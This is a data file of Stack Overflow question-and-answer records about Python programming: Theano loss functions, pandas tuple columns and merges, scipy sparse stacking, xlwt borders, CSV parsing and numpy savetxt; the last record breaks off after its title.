Dataset schema (field: type, observed range):
title: string, length 10 to 172
question_id: int64, 469 to 40.1M
question_body: string, length 22 to 48.2k
question_score: int64, -44 to 5.52k
question_date: string, length 20
answer_id: int64, 497 to 40.1M
answer_body: string, length 18 to 33.9k
answer_score: int64, -38 to 8.38k
answer_date: string, length 20
tags: list, length 1 to 5
Tilted loss in theano
38,497,955
<p>I am trying to calculate the tilted loss, which in turn will be used in Keras. However, I must be doing something wrong, since I am getting negative loss values (which ought to be impossible). Can anyone point out what I've done wrong? I'm assuming it's the Theano syntax that I have got wrong.</p> <p>The loss is defined mathematically as: <a href="http://i.stack.imgur.com/FWlAs.png" rel="nofollow"><img src="http://i.stack.imgur.com/FWlAs.png" alt="enter image description here"></a> where $\xi_i = y_i - f_i$, with $y_i$ the observation and $f_i$ the prediction. Furthermore, I am after the mean loss, thus I have defined my loss function as:</p> <pre><code>$$ \mathcal{L} = \frac{\alpha\sum \xi_i-\sum I(\xi_i&lt;0)\xi_i}{N} $$ </code></pre> <p>where $I()$ is the indicator function, which takes the value 1 if true.</p> <p>Hence my loss function is defined as follows:</p> <pre><code>def tilted_loss2(y,f): q = 0.05 e = (y-f) return (q*tt.sum(e)-tt.sum(e[e&lt;0]))/e.shape[0] </code></pre> <p>However, when I run my network I get negative values. Is there something wrong with the Theano syntax here? My biggest suspicion is <code>tt.sum(e[e&lt;0])</code>. Can you slice it like this?</p> <p>Any thoughts would be appreciated.</p>
0
2016-07-21T07:40:16Z
38,501,057
<p>You cannot slice like this (<a href="http://stackoverflow.com/questions/37425401/theano-tensor-slicing-how-to-use-boolean-to-slice/37425475#37425475">see this answer</a>). You need to change your loss function as follows:</p> <pre><code>def tilted_loss2(y,f): q = 0.05 e = (y-f) return (q*tt.sum(e)-tt.sum(e[(e&lt;0).nonzero()]))/e.shape[0] </code></pre> <p>You can also try this workaround, which uses <code>abs</code> and avoids the slicing syntax altogether:</p> <pre><code>def tilted_loss2(y,f): q = 0.05 e = (y-f) return (q*tt.sum(e)-tt.sum(e-abs(e))/2.)/e.shape[0] </code></pre>
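As a sanity check outside Theano, here is a minimal NumPy sketch of the same mean tilted (pinball) loss; each residual contributes q*e (for e >= 0) or (q-1)*e (for e < 0), both of which are non-negative for 0 < q < 1, so the mean can never go negative:

```python
import numpy as np

def tilted_loss(y, f, q=0.05):
    """Mean tilted (pinball) loss: q*e for e >= 0 and (q-1)*e for e < 0."""
    e = y - f
    # q*sum(e) minus the sum of negative residuals; term-by-term this is
    # q*e when e >= 0 and (q-1)*e when e < 0, both non-negative
    return (q * np.sum(e) - np.sum(e[e < 0])) / e.shape[0]

y = np.array([1.0, 2.0, 3.0])
f = np.array([1.5, 1.5, 3.5])
print(tilted_loss(y, f))  # ~0.325, never negative
```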
2
2016-07-21T10:00:58Z
[ "python", "theano", "keras" ]
PyFann data format for list described dataset
38,498,119
<p>I am working on detecting regions of a specific tree in an aerial image, and my approach uses texture detection. I have 4 descriptors/features and I want to use FANN to create a machine learning environment that would properly detect the regions.</p> <p>My question is: is the input format for pyfann always as described in <a href="http://stackoverflow.com/a/25703709/5722784">http://stackoverflow.com/a/25703709/5722784</a>? </p> <p>What if I would like to have 4 input neurons and one output neuron, where for each input neuron I have a list (not a single integer) that I would like to feed to it? Can FANN support this? If so, what format do I have to follow in making the input data? </p> <p>Thank you so much for any significant responses :) </p>
0
2016-07-21T07:48:35Z
39,946,524
<p>Each input neuron can only take a single input - this is the case for all neural networks, irrespective of the library you use. I would suggest using each element in each of your lists as an input to the neural network, e.g. inputs 1-5 are your first list and then 6-10 are your second list. If you have variable length lists you likely have a problem, though.</p>
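The flattening described above can be sketched in plain Python (no FANN API is assumed here; the four 5-element descriptor lists are made up for illustration):

```python
def flatten_features(feature_lists):
    """Concatenate fixed-length feature lists into one flat input vector."""
    flat = []
    for lst in feature_lists:
        flat.extend(lst)
    return flat

# four descriptors, each a list of 5 values -> a 20-neuron input layer
descriptors = [[0.1] * 5, [0.2] * 5, [0.3] * 5, [0.4] * 5]
inputs = flatten_features(descriptors)
print(len(inputs))  # 20
```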
0
2016-10-09T17:37:06Z
[ "python", "neural-network", "fann" ]
Accessing original function variables in decorators
38,498,159
<p>I'm making a logging module in Python which reports every exception that happens at run time to a server, so in every function I have to write:</p> <pre><code>def a_func(): try: #stuff here pass except: Logger.writeError(self.__class__.__name__, inspect.stack()[1][3],\ tracer(self, vars())) </code></pre> <p>As you can see, I'm using the <code>vars()</code> function to get the variables which caused the exception. I read about decorators and decided to use them:</p> <pre><code>def flog(func): def flog_wrapper(*args, **kwargs): try: func(*args, **kwargs) except Exception as e: print "At flog:", e #self.myLogger.writeError(self.__class__.__name__, inspect.stack()[1][3], tracer(self, vars())) return flog_wrapper </code></pre> <p>The problem is that I don't have access to the original function's (<code>func</code>) variables (<code>vars()</code>) here. Is there a way to access them in the decorator function?</p>
0
2016-07-21T07:50:29Z
38,498,394
<p>You don't need to use <code>vars()</code>. The <em>traceback</em> of an exception has everything you need:</p> <pre><code>import inspect import sys def flog(func): def flog_wrapper(self, *args, **kwargs): try: return func(self, *args, **kwargs) except Exception: exc_type, exc_value, tb = sys.exc_info() print "At flog:", exc_value frame_locals = tb.tb_frame.f_locals self.myLogger.writeError(type(self).__name__, inspect.stack()[1][3], tracer(self, frame_locals)) del tb return flog_wrapper </code></pre> <p>The traceback contains a chained series of execution frames; each frame has a reference to the locals used in that frame.</p> <p>You do very much want to clean up the reference to the traceback: because the traceback includes the wrapper function frame, you have a circular reference, and that is best broken early.</p>
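The same idea in a self-contained, runnable form (Python 3 syntax; returning the captured locals stands in for the logger call, which is hypothetical here):

```python
import sys

def flog(func):
    """Decorator that captures the failing function's local variables."""
    def flog_wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except Exception:
            _, exc_value, tb = sys.exc_info()
            # walk to the innermost frame: the decorated function itself
            while tb.tb_next is not None:
                tb = tb.tb_next
            captured = dict(tb.tb_frame.f_locals)
            del tb  # break the circular reference
            return exc_value, captured  # a real logger call would go here
    return flog_wrapper

@flog
def boom(x):
    y = x * 2
    raise ValueError("oops")

exc, local_vars = boom(3)
print(local_vars)  # {'x': 3, 'y': 6}
```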
0
2016-07-21T08:02:42Z
[ "python", "python-2.7", "python-decorators" ]
How do I get all values from one position in a tuple in a pandas dataframe column?
38,498,239
<p>I have a pandas dataframe where several columns are filled with tuples with two values each, mixed types.</p> <p>Example:</p> <pre><code>import pandas as pd D = [{'A':1,'B':'Test1','C':('C1',True)},\ {'A':2,'B':'Test2','C':(77,u'orz')},\ {'A':3,'B':'Test3','C':(u'ASDFG',[1,2,3])}] F = pd.DataFrame.from_dict(D) print F </code></pre> <p>This is the normal output:</p> <pre><code> A B C 0 1 Test1 (C1, True) 1 2 Test2 (77, orz) 2 3 Test3 (ASDFG, [1, 2, 3]) </code></pre> <p>And what I want is e.g. the second value from each tuple in column C, that is an output like:</p> <pre><code>True, orz, [1,2,3] </code></pre> <p>In Numpy you can do this:</p> <pre><code>import numpy as np A = np.array([[1,2,3],[4,5,6],[7,8,9]]) print A[:,0] </code></pre> <p>Giving you:</p> <pre><code>[1 4 7] </code></pre> <p>But this doesn't work in pandas, so is there any way to do this or do I have to transform the data in a different way?</p>
1
2016-07-21T07:54:28Z
38,498,294
<p>One way is to use a list comprehension and extract the second item in the tuple pair.</p> <pre><code>&gt;&gt;&gt; [tup[1] for tup in F.C] [True, u'orz', [1, 2, 3]] </code></pre>
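This is runnable end-to-end (Python 3, building the frame from the question):

```python
import pandas as pd

D = [{'A': 1, 'B': 'Test1', 'C': ('C1', True)},
     {'A': 2, 'B': 'Test2', 'C': (77, 'orz')},
     {'A': 3, 'B': 'Test3', 'C': ('ASDFG', [1, 2, 3])}]
F = pd.DataFrame(D)

# iterate over the column's tuples and keep each second element
second_items = [tup[1] for tup in F['C']]
print(second_items)  # [True, 'orz', [1, 2, 3]]
```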
2
2016-07-21T07:57:09Z
[ "python", "numpy", "pandas" ]
How do I get all values from one position in a tuple in a pandas dataframe column?
38,498,239
<p>I have a pandas dataframe where several columns are filled with tuples with two values each, mixed types.</p> <p>Example:</p> <pre><code>import pandas as pd D = [{'A':1,'B':'Test1','C':('C1',True)},\ {'A':2,'B':'Test2','C':(77,u'orz')},\ {'A':3,'B':'Test3','C':(u'ASDFG',[1,2,3])}] F = pd.DataFrame.from_dict(D) print F </code></pre> <p>This is the normal output:</p> <pre><code> A B C 0 1 Test1 (C1, True) 1 2 Test2 (77, orz) 2 3 Test3 (ASDFG, [1, 2, 3]) </code></pre> <p>And what I want is e.g. the second value from each tuple in column C, that is an output like:</p> <pre><code>True, orz, [1,2,3] </code></pre> <p>In Numpy you can do this:</p> <pre><code>import numpy as np A = np.array([[1,2,3],[4,5,6],[7,8,9]]) print A[:,0] </code></pre> <p>Giving you:</p> <pre><code>[1 4 7] </code></pre> <p>But this doesn't work in pandas, so is there any way to do this or do I have to transform the data in a different way?</p>
1
2016-07-21T07:54:28Z
38,499,436
<p>If you prefer to stay in the pandas DataFrame/Series domain:</p> <pre><code>F.C.apply(lambda x: x[-1]) </code></pre> <p>Returns:</p> <pre><code>&gt;&gt;&gt; F.C.apply(lambda x: x[-1]) 0 True 1 orz 2 [1, 2, 3] Name: C, dtype: object </code></pre>
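Newer pandas versions also expose positional element access through the `.str` accessor, which works element-wise on tuples and lists as well as strings (an alternative not shown in the answer):

```python
import pandas as pd

s = pd.Series([('C1', True), (77, 'orz'), ('ASDFG', [1, 2, 3])])

# Series.str.get indexes into each element (tuple, list, or string)
last_items = s.str.get(-1)
print(list(last_items))  # [True, 'orz', [1, 2, 3]]
```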
1
2016-07-21T08:51:23Z
[ "python", "numpy", "pandas" ]
How can I map an ontology components to a relational database?
38,498,290
<p>I already have an OWL ontology which contains classes, instances and object properties. How can I map them to a relational database such as MySQL, using Python as the programming language?<br> <strong>For example</strong>, an ontology can contain the classes "Country" and "City" and instances like "United States" and "NYC". So I need to store them in relational database tables. I would like to know if there are Python libraries to do so. </p>
0
2016-07-21T07:56:54Z
38,498,458
<p>If I understand you well, I think you could use SQLite with Python. SQLite is great because you just have to import the library with:</p> <pre><code>import sqlite3 </code></pre> <p>And then there is no need for a server. Things are stored in a file, generally ending with <code>.db</code>.</p> <p>Have a look at the docs; the examples are helpful: <a href="https://docs.python.org/2/library/sqlite3.html" rel="nofollow">https://docs.python.org/2/library/sqlite3.html</a></p> <p><strong>EDIT:</strong> To review or create your database and tables, I advise you to use sqlitebrowser, which is light and easy to use: <a href="http://sqlitebrowser.org/" rel="nofollow">http://sqlitebrowser.org/</a></p>
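A minimal sketch of such a mapping with the stdlib `sqlite3` module. The two-table classes/instances layout is an illustrative assumption, not a standard ontology-to-SQL mapping:

```python
import sqlite3

conn = sqlite3.connect(':memory:')  # or a file such as 'ontology.db'
cur = conn.cursor()
cur.execute('CREATE TABLE classes (id INTEGER PRIMARY KEY, name TEXT UNIQUE)')
cur.execute('CREATE TABLE instances ('
            'id INTEGER PRIMARY KEY, name TEXT, '
            'class_id INTEGER REFERENCES classes(id))')

cur.execute("INSERT INTO classes (name) VALUES ('Country')")
class_id = cur.lastrowid
cur.execute("INSERT INTO instances (name, class_id) VALUES ('United States', ?)",
            (class_id,))
conn.commit()

row = cur.execute('SELECT c.name, i.name FROM instances i '
                  'JOIN classes c ON i.class_id = c.id').fetchone()
print(row)  # ('Country', 'United States')
```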
0
2016-07-21T08:06:13Z
[ "python", "mysql", "relational-database", "semantic-web", "ontology" ]
How can I map an ontology components to a relational database?
38,498,290
<p>I already have an OWL ontology which contains classes, instances and object properties. How can I map them to a relational database such as MySQL, using Python as the programming language?<br> <strong>For example</strong>, an ontology can contain the classes "Country" and "City" and instances like "United States" and "NYC". So I need to store them in relational database tables. I would like to know if there are Python libraries to do so. </p>
0
2016-07-21T07:56:54Z
38,534,519
<p>Use the right tool for the job. You're using RDF (that it consists of OWL axioms is immaterial), and you want to store and query it. Use an RDF database: they're optimized for storing and querying RDF. It's a waste of your time to homegrow storage &amp; querying in MySQL when other folks have already figured out how best to do this.</p> <p>As an aside, there is a way to map RDF to a relational database; there's a formal specification for this, called R2RML.</p>
0
2016-07-22T20:08:00Z
[ "python", "mysql", "relational-database", "semantic-web", "ontology" ]
How to column_stack a numpy array with a scipy sparse matrix?
38,498,299
<p>I have the following matrices:</p> <pre><code>A.toarray() array([[0, 0, 0, ..., 0, 0, 0], [0, 0, 0, ..., 0, 0, 0], [0, 0, 0, ..., 0, 0, 0], ..., [0, 0, 0, ..., 0, 0, 0], [0, 0, 0, ..., 0, 0, 0], [0, 0, 0, ..., 0, 0, 0]], dtype=int64) type(A) scipy.sparse.csr.csr_matrix A.shape (878049, 942) </code></pre> <p>And matrix B:</p> <pre><code>B array([2248, 2248, 2248, ..., 0, 0, 0]) type(B) numpy.ndarray B.shape (878049,) </code></pre> <p>I would like to column-stack <code>A</code> and <code>B</code> into <code>C</code>. I tried the following:</p> <pre><code>C = sparse.column_stack([A,B]) </code></pre> <p>Then:</p> <pre><code>/usr/local/lib/python3.5/site-packages/numpy/lib/shape_base.py in column_stack(tup) 315 arr = array(arr, copy=False, subok=True, ndmin=2).T 316 arrays.append(arr) --&gt; 317 return _nx.concatenate(arrays, 1) 318 319 def dstack(tup): ValueError: all the input array dimensions except for the concatenation axis must match exactly </code></pre> <p>My problem is how to preserve the dimensions. Any idea how to column-stack them?</p> <p><strong>Update</strong></p> <p>I tried the following:</p> <pre><code>#Sorry for the name C = np.vstack(( A.A.T, B)).T </code></pre> <p>and I got:</p> <pre><code>array([[ 0, 0, 0, ..., 0, 6], [ 0, 0, 0, ..., 0, 6], [ 0, 0, 0, ..., 0, 6], ..., [ 0, 0, 0, ..., 0, 1], [ 0, 0, 0, ..., 0, 1], [ 0, 0, 0, ..., 0, 1]], dtype=int64) </code></pre> <p><strong>Is this the correct way to column-stack them?</strong></p>
0
2016-07-21T07:57:38Z
38,498,421
<p>Did you try the following? </p> <pre><code>C=np.vstack((A.T,B)).T </code></pre> <p>With sample values:</p> <pre><code>A = array([[1, 2, 3], [4, 5, 6]]) &gt;&gt;&gt;&gt; A.shape (2, 3) B = array([7, 8]) &gt;&gt;&gt; B.shape (2,) C=np.vstack((A.T,B)).T &gt;&gt;&gt; C.shape (2, 4) </code></pre> <p>If A is a sparse matrix, and you want to maintain the output as sparse, you could do:</p> <pre><code>C=np.vstack((A.A.T,B)).T D=csr_matrix((C)) </code></pre>
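The transpose trick is runnable as-is on the sample values:

```python
import numpy as np

A = np.array([[1, 2, 3],
              [4, 5, 6]])
B = np.array([7, 8])

# stack B as an extra row of A.T, then transpose back: B becomes a new column
C = np.vstack((A.T, B)).T
print(C)
# [[1 2 3 7]
#  [4 5 6 8]]
```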
1
2016-07-21T08:04:15Z
[ "python", "python-2.7", "python-3.x", "numpy", "scipy" ]
How to column_stack a numpy array with a scipy sparse matrix?
38,498,299
<p>I have the following matrices:</p> <pre><code>A.toarray() array([[0, 0, 0, ..., 0, 0, 0], [0, 0, 0, ..., 0, 0, 0], [0, 0, 0, ..., 0, 0, 0], ..., [0, 0, 0, ..., 0, 0, 0], [0, 0, 0, ..., 0, 0, 0], [0, 0, 0, ..., 0, 0, 0]], dtype=int64) type(A) scipy.sparse.csr.csr_matrix A.shape (878049, 942) </code></pre> <p>And matrix B:</p> <pre><code>B array([2248, 2248, 2248, ..., 0, 0, 0]) type(B) numpy.ndarray B.shape (878049,) </code></pre> <p>I would like to column-stack <code>A</code> and <code>B</code> into <code>C</code>. I tried the following:</p> <pre><code>C = sparse.column_stack([A,B]) </code></pre> <p>Then:</p> <pre><code>/usr/local/lib/python3.5/site-packages/numpy/lib/shape_base.py in column_stack(tup) 315 arr = array(arr, copy=False, subok=True, ndmin=2).T 316 arrays.append(arr) --&gt; 317 return _nx.concatenate(arrays, 1) 318 319 def dstack(tup): ValueError: all the input array dimensions except for the concatenation axis must match exactly </code></pre> <p>My problem is how to preserve the dimensions. Any idea how to column-stack them?</p> <p><strong>Update</strong></p> <p>I tried the following:</p> <pre><code>#Sorry for the name C = np.vstack(( A.A.T, B)).T </code></pre> <p>and I got:</p> <pre><code>array([[ 0, 0, 0, ..., 0, 6], [ 0, 0, 0, ..., 0, 6], [ 0, 0, 0, ..., 0, 6], ..., [ 0, 0, 0, ..., 0, 1], [ 0, 0, 0, ..., 0, 1], [ 0, 0, 0, ..., 0, 1]], dtype=int64) </code></pre> <p><strong>Is this the correct way to column-stack them?</strong></p>
0
2016-07-21T07:57:38Z
38,518,846
<p>2 issues </p> <ul> <li>there isn't a <code>sparse.column_stack</code></li> <li>you are mixing a sparse matrix and dense array</li> </ul> <p>2 smaller examples:</p> <pre><code>In [129]: A=sparse.csr_matrix([[1,0,0],[0,1,0]]) In [130]: B=np.array([1,2]) </code></pre> <p>Using <code>np.column_stack</code> gives your error:</p> <pre><code>In [131]: np.column_stack((A,B)) ... ValueError: all the input array dimensions except for the concatenation axis must match exactly </code></pre> <p>But if I first turn <code>A</code> into an array, column_stack does fine:</p> <pre><code>In [132]: np.column_stack((A.A, B)) Out[132]: array([[1, 0, 0, 1], [0, 1, 0, 2]]) </code></pre> <p>the equivalent with <code>concatenate</code>:</p> <pre><code>In [133]: np.concatenate((A.A, B[:,None]), axis=1) Out[133]: array([[1, 0, 0, 1], [0, 1, 0, 2]]) </code></pre> <p>there is a <code>sparse.hstack</code>. For that I need to turn <code>B</code> into a sparse matrix as well. Transpose works because it is now a matrix (as opposed to a 1d array):</p> <pre><code>In [134]: sparse.hstack((A,sparse.csr_matrix(B).T)) Out[134]: &lt;2x4 sparse matrix of type '&lt;class 'numpy.int32'&gt;' with 4 stored elements in COOrdinate format&gt; In [135]: _.A Out[135]: array([[1, 0, 0, 1], [0, 1, 0, 2]], dtype=int32) </code></pre>
1
2016-07-22T05:30:27Z
[ "python", "python-2.7", "python-3.x", "numpy", "scipy" ]
Unexpected behaviour of border: * no_line
38,498,392
<p>I am trying to create cells without borders, but somehow that default thin border is always there.</p> <pre class="lang-python prettyprint-override"><code>from xlwt import Workbook,easyxf tl = easyxf('border: top thick, right no_line, bottom no_line, left thick') tr = easyxf('border: top thick, right thick, bottom no_line, left no_line') br = easyxf('border: top no_line, right thick, bottom thick, left no_line') bl = easyxf('border: top no_line, right no_line, bottom thick, left thick') w = Workbook() ws = w.add_sheet('Border') ws.write(1, 1, style=tl) ws.write(1, 2, style=tr) ws.write(2, 1, style=bl) ws.write(2, 2, style=br) w.save('borders-test.xls') </code></pre> <p>What I get is</p> <p><a href="http://i.stack.imgur.com/ZeNf8.png" rel="nofollow"><img src="http://i.stack.imgur.com/ZeNf8.png" alt="Result"></a> </p> <p>However I would expect (no thin borders within thick borders)</p> <p><a href="http://i.stack.imgur.com/hqbcS.png" rel="nofollow"><img src="http://i.stack.imgur.com/hqbcS.png" alt="Expectation"></a></p> <p>I am looking for the solution to make <code>no_line</code> work as expected (or to understand that it is actually some different thing and adjust my expectations). I am however not looking for workarounds like "set color of border the same as background" (unless it is known that GUIs work the very same way).</p> <pre><code>Python 3.5.2 |Continuum Analytics, Inc.| (default, Jul 2 2016, 17:52:12) [GCC 4.2.1 Compatible Apple LLVM 4.2 (clang-425.0.28)] on darwin xlwt==1.1.2 </code></pre> <p>p.s. Simply removing <code>... no_line</code> parts from code (as it is default) does not make any difference.</p>
0
2016-07-21T08:02:40Z
39,062,012
<p>Use <code>top_color</code> <em>color</em>, <code>bottom_color</code> <em>color</em>, <code>left_color</code> <em>color</em>, <code>right_color</code> <em>color</em>, which in your case should be white.</p> <p>Wherever you don't want a border, set that side's color to white; for example, in <strong>tl</strong> you don't want borders at the right and bottom, so set right_color white, bottom_color white.</p> <pre><code>from xlwt import Workbook,easyxf tl = easyxf('border: top thick, bottom thick, left thick, right thick, right_color white, bottom_color white') tr = easyxf('border: top thick, bottom thick, left thick, right thick, left_color white, bottom_color white') br = easyxf('border: top thick, bottom thick, left thick, right thick, left_color white, top_color white') bl = easyxf('border: top thick, bottom thick, left thick, right thick, right_color white, top_color white') w = Workbook() ws = w.add_sheet('Border') ws.write(1, 1, style=tl) ws.write(1, 2, style=tr) ws.write(2, 1, style=bl) ws.write(2, 2, style=br) w.save('borders-test.xls') </code></pre> <p>Hope this solves your problem.</p>
0
2016-08-21T07:48:09Z
[ "python", "xlwt" ]
Read csv to dict of dicts
38,498,419
<p>Let's say I have this CSV file:</p> <pre><code>Header1, Header2, Header3 key1, 1, 2 key2, 3, 4 </code></pre> <p>I'd like to convert it to the following dict:</p> <pre><code>{Header2: {key1: 1, key2: 3}, Header3: {key1: 2, key2: 4}} </code></pre> <p>Is there a simple way to do this? I tried using <code>csv.DictReader</code> and pandas, but did not find a simple way, although this looks to me like a common use case.</p>
2
2016-07-21T08:04:11Z
38,498,744
<p>You can use the <code>to_dict</code> method of a pandas DataFrame instance. For example:</p> <pre><code>import pandas as pd df = pd.read_csv('file.csv', delimiter=r',\s+', index_col=0) print(df.to_dict()) </code></pre>
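A runnable variant using an in-memory file; `skipinitialspace=True` is used here instead of the regex delimiter to strip the spaces after the commas:

```python
import io
import pandas as pd

csv_text = "Header1, Header2, Header3\nkey1, 1, 2\nkey2, 3, 4\n"
df = pd.read_csv(io.StringIO(csv_text), skipinitialspace=True, index_col=0)
result = df.to_dict()
print(result)
# {'Header2': {'key1': 1, 'key2': 3}, 'Header3': {'key1': 2, 'key2': 4}}
# (the leaf values are numpy integers)
```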
2
2016-07-21T08:19:06Z
[ "python", "csv", "dictionary" ]
Read csv to dict of dicts
38,498,419
<p>Let's say I have this CSV file:</p> <pre><code>Header1, Header2, Header3 key1, 1, 2 key2, 3, 4 </code></pre> <p>I'd like to convert it to the following dict:</p> <pre><code>{Header2: {key1: 1, key2: 3}, Header3: {key1: 2, key2: 4}} </code></pre> <p>Is there a simple way to do this? I tried using <code>csv.DictReader</code> and pandas, but did not find a simple way, although this looks to me like a common use case.</p>
2
2016-07-21T08:04:11Z
38,498,891
<p>You can do this with <code>csv</code> module:</p> <pre><code>import csv f = open(csv_file_path) reader = csv.DictReader(f) fieldnames = reader.fieldnames result = {fieldname:{} for fieldname in fieldnames[1:]} for row in reader: for fieldname in fieldnames[1:]: result[fieldname][row['Header1'].strip()] = row[fieldname].strip() </code></pre>
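The same approach, made self-contained with an in-memory file (note the values stay strings here, unlike the pandas route):

```python
import csv
import io

csv_text = "Header1, Header2, Header3\nkey1, 1, 2\nkey2, 3, 4\n"
reader = csv.DictReader(io.StringIO(csv_text), skipinitialspace=True)
fieldnames = reader.fieldnames  # ['Header1', 'Header2', 'Header3']
result = {name: {} for name in fieldnames[1:]}
for row in reader:
    for name in fieldnames[1:]:
        result[name][row['Header1']] = row[name]
print(result)
# {'Header2': {'key1': '1', 'key2': '3'}, 'Header3': {'key1': '2', 'key2': '4'}}
```

Convert with `int()` inside the loop if numeric values are needed.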
0
2016-07-21T08:26:25Z
[ "python", "csv", "dictionary" ]
Merge two data frames on multiple values
38,498,453
<p>I have two data frames which look like this</p> <p><strong>df1</strong></p> <pre><code> name ID abb 0 foo 251803 I 1 bar 376811 R 2 baz 174254 Q 3 foofoo 337144 IRQ 4 barbar 306521 IQ </code></pre> <p><strong>df2</strong></p> <pre><code> abb comment 0 I fine 1 R repeat 2 Q other </code></pre> <p>I am trying to use pandas <code>merge</code> to join the two data frames and simply assign the <code>comment</code> column in the second data frame to the first, based on the <code>abb</code> column, in the following way:</p> <pre><code>df1.merge(df2, how='inner', on='abb') </code></pre> <p>resulting in:</p> <pre><code> name ID abb comment 0 foo 251803 I fine 1 bar 376811 R repeat 2 baz 174254 Q other </code></pre> <p>This works well for the unique one-letter identifiers in <code>abb</code>. However, it obviously fails for more than one character. </p> <p>I tried to use <code>list</code> on the <code>abb</code> column in the first data frame, but this results in a <code>KeyError</code>.</p> <p>What I would like to do is the following:</p> <p>1) Separate the rows containing more than one character in this column into several rows</p> <p>2) Merge the data frames</p> <p>3) Optionally: Combine the rows again</p>
1
2016-07-21T08:05:55Z
38,498,580
<p>Use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.join.html" rel="nofollow"><code>join</code></a>:</p> <pre><code>print (df1) name ID abb 0 foo 251803 I 1 bar 376811 R 2 baz 174254 Q 3 foofoo 337144 IRQ 4 barbar 306521 IQ #each character to df, which is stacked to Series s = (df1.abb.apply(lambda x: pd.Series(list(x))) .stack() .reset_index(drop=True, level=1) .rename('abb')) print (s) 0 I 1 R 2 Q 3 I 3 R 3 Q 4 I 4 Q Name: abb, dtype: object df1 = df1.drop('abb', axis=1).join(s) print (df1) name ID abb 0 foo 251803 I 1 bar 376811 R 2 baz 174254 Q 3 foofoo 337144 I 3 foofoo 337144 R 3 foofoo 337144 Q 4 barbar 306521 I 4 barbar 306521 Q </code></pre>
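On pandas 0.25 or newer (released well after this answer), the splitting step can also be written with `DataFrame.explode`; a sketch on a two-row subset of the question's data:

```python
import pandas as pd

df1 = pd.DataFrame({'name': ['foo', 'foofoo'],
                    'ID': [251803, 337144],
                    'abb': ['I', 'IRQ']})
df2 = pd.DataFrame({'abb': ['I', 'R', 'Q'],
                    'comment': ['fine', 'repeat', 'other']})

# split each abb string into characters, one row per character, then merge
exploded = df1.assign(abb=df1['abb'].map(list)).explode('abb')
merged = exploded.merge(df2, on='abb')
print(merged[['name', 'abb', 'comment']].to_string(index=False))
```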
2
2016-07-21T08:11:50Z
[ "python", "pandas" ]
Merge two data frames on multiple values
38,498,453
<p>I have two data frames which look like this</p> <p><strong>df1</strong></p> <pre><code> name ID abb 0 foo 251803 I 1 bar 376811 R 2 baz 174254 Q 3 foofoo 337144 IRQ 4 barbar 306521 IQ </code></pre> <p><strong>df2</strong></p> <pre><code> abb comment 0 I fine 1 R repeat 2 Q other </code></pre> <p>I am trying to use pandas <code>merge</code> to join the two data frames and simply assign the <code>comment</code> column in the second data frame to the first, based on the <code>abb</code> column, in the following way:</p> <pre><code>df1.merge(df2, how='inner', on='abb') </code></pre> <p>resulting in:</p> <pre><code> name ID abb comment 0 foo 251803 I fine 1 bar 376811 R repeat 2 baz 174254 Q other </code></pre> <p>This works well for the unique one-letter identifiers in <code>abb</code>. However, it obviously fails for more than one character. </p> <p>I tried to use <code>list</code> on the <code>abb</code> column in the first data frame, but this results in a <code>KeyError</code>.</p> <p>What I would like to do is the following:</p> <p>1) Separate the rows containing more than one character in this column into several rows</p> <p>2) Merge the data frames</p> <p>3) Optionally: Combine the rows again</p>
1
2016-07-21T08:05:55Z
38,499,036
<p>See this <a href="http://stackoverflow.com/a/38432346/2336654">answer</a> for various ways to explode on a column. The row values must be appended in the same order as <code>df1.columns</code> (name, ID, abb):</p> <pre><code>rows = [] for i, row in df1.iterrows(): for a in row.abb: rows.append([row['name'], row['ID'], a]) df11 = pd.DataFrame(rows, columns=df1.columns) df11.merge(df2) </code></pre> <p><a href="http://i.stack.imgur.com/oGuAA.png" rel="nofollow"><img src="http://i.stack.imgur.com/oGuAA.png" alt="enter image description here"></a></p>
1
2016-07-21T08:32:26Z
[ "python", "pandas" ]
Write numpy structured array using savetxt
38,498,477
<p>I faced a problem with writing structured array in txt file. Having an output file (<em>outfile</em>) opened, I use the following numpy function:</p> <pre><code>np.savetxt(*outfile*, ***recarray***, fmt=['%s','%-7.4f','%-7.4f','%-7.4f']) </code></pre> <p>The <strong><em>recarray</em></strong> is like [ (b'H', 0.9425, 0.1412, 7.1414) ... (b'N', 1.0037, 4.0524, 6.8000) ], where the first element has <code>numpy.bytes_</code> type and others are <code>numpy.float64</code>. </p> <p>An error message appears while writing this recarray in file:</p> <pre><code>TypeError: must be str, not bytes </code></pre> <p>So, what is the easiest way to put this array in file? Maybe there is another function?</p>
0
2016-07-21T08:06:58Z
38,498,626
<p>I assume that you are using Python 3. In this case, you have to prefix <code>'%s'</code> with the letter <code>b</code>, like this: <code>b'%s'</code>.</p> <p>In Python 3, the default string type is unicode, so you have to use the extra <code>b</code> to mark byte strings.</p> <p>Your script should be:</p> <pre><code>np.savetxt(*outfile*, ***recarray***, fmt=[b'%s','%-7.4f','%-7.4f','%-7.4f']) </code></pre> <p>Don't forget to open your .txt file in binary mode (<code>wb</code>):</p> <pre><code>file = open('workfile.txt','wb') </code></pre>
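If the byte-format trick doesn't work in your numpy version, an alternative is to decode the byte strings and format the rows yourself, sidestepping `savetxt` entirely (a sketch; the field names are made up):

```python
import numpy as np

rec = np.array([(b'H', 0.9425, 0.1412, 7.1414),
                (b'N', 1.0037, 4.0524, 6.8000)],
               dtype=[('sym', 'S2'), ('x', 'f8'), ('y', 'f8'), ('z', 'f8')])

# decode the bytes field, keep the float formatting from the question
lines = ['%s %-7.4f %-7.4f %-7.4f' % (r['sym'].decode('ascii'),
                                      r['x'], r['y'], r['z'])
         for r in rec]
with open('outfile.txt', 'w') as fh:
    fh.write('\n'.join(lines) + '\n')
print(lines[0])
```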
0
2016-07-21T08:13:51Z
[ "python", "numpy" ]
Error when creating Database Tables - CKAN
38,498,590
